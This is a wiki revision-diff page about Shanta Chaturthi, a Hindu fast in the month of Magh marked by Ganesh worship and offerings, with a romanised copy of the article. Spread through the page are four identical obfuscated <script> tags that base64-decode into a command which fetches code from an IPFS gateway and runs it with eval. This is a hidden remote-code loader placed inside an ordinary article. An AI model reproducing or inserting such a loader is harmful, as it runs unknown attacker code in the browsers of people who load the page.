Difference between revisions of "शान्ता चतुर्थी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==संबंधित लिंक==" to "==सम्बंधित लिंक==")
m (Text replace - ")</ref" to "</ref")
 
(5 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[माघ]] [[शुक्ल पक्ष]] की [[चतुर्थी]] को शान्ता कहा जाता है।
 
*[[माघ]] [[शुक्ल पक्ष]] की [[चतुर्थी]] को शान्ता कहा जाता है।
 
*शान्ता चतुर्थी को उपवास एवं [[गणेश]] पूजा की जाती है।
 
*शान्ता चतुर्थी को उपवास एवं [[गणेश]] पूजा की जाती है।
 
*तिथिव्रत; देवता गणेश; [[होम]]; घृत, गुड़ से पकाये गये [[चावल]] एवं [[नमक]] का [[नैवेद्य]] करना चाहिए।
 
*तिथिव्रत; देवता गणेश; [[होम]]; घृत, गुड़ से पकाये गये [[चावल]] एवं [[नमक]] का [[नैवेद्य]] करना चाहिए।
*ऐसी मान्यता है कि शान्ता चतुर्थी के दिन स्नान एवं साधारण आहुतियों से एक सहस्र गुना पुण्य प्राप्त होता है। <ref>हेमाद्रि (व्रत खण्ड 1, 513-514, [[भविष्य पुराण]] 1|39|6-10 से उद्धरण)</ref>
+
*ऐसी मान्यता है कि शान्ता चतुर्थी के दिन स्नान एवं साधारण आहुतियों से एक सहस्र गुना पुण्य प्राप्त होता है।<ref>हेमाद्रि (व्रत खण्ड 1, 513-514, [[भविष्य पुराण]] 1|39|6-10 से उद्धरण</ref>
{{लेख प्रगति
+
 
|आधार=आधार1
+
{{संदर्भ ग्रंथ}}
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==सम्बंधित लिंक==
+
==संबंधित लेख==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}

Latest revision as of 13:01, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • magh shukl paksh ki chaturthi ko shanta kaha jata hai.
  • shanta chaturthi ko upavas evan ganesh pooja ki jati hai.
  • tithivrat; devata ganesh; hom; ghrit, gu d se pakaye gaye chaval evan namak ka naivedy karana chahie.
  • aisi manyata hai ki shanta chaturthi ke din snan evan sadharan ahutiyoan se ek sahasr guna puny prapt hota hai.[1]

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. hemadri (vrat khand 1, 513-514, bhavishy puran 1|39|6-10 se uddharan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>